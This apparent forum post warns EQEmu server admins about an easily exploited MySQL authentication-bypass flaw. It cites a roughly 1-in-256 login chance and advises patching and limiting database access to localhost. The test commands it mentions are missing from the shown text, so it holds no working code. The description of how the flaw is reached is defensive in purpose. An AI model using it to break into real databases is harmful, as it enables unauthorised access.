MySQL Stupid Easy Exploit
 

Just throwing this out there, a minor exploit has come up for MySQL.

It affects very few setups from my understanding, but I am still passing this along.

http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve...ous-mysql.html

Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.


To test for this on Windows, take the three command below and save into a bat file:
To test for this on Linux, take ONE of these two and pass into terminal:
If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to database until a patch is made available.

-Hate




EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.

It's a good time to point out to new server admins that you should restrict access to your server to a limited set of IPs. For many servers, this means localhost only. If you go and open up port 3306 and tell mysql to listen on a public interface, you open up your server to an exploit like this.

The default ubuntu install has mysql listen on localhost only (probably debian too). I'm not sure about windows.

This brings up a good point. If the MySQL access is restricted to localhost (127.0.0.1) only, this exploit (and others) can only be run if the baddy has access to the machine physically (or has broken in through another exploit/vulnerability).

-Hate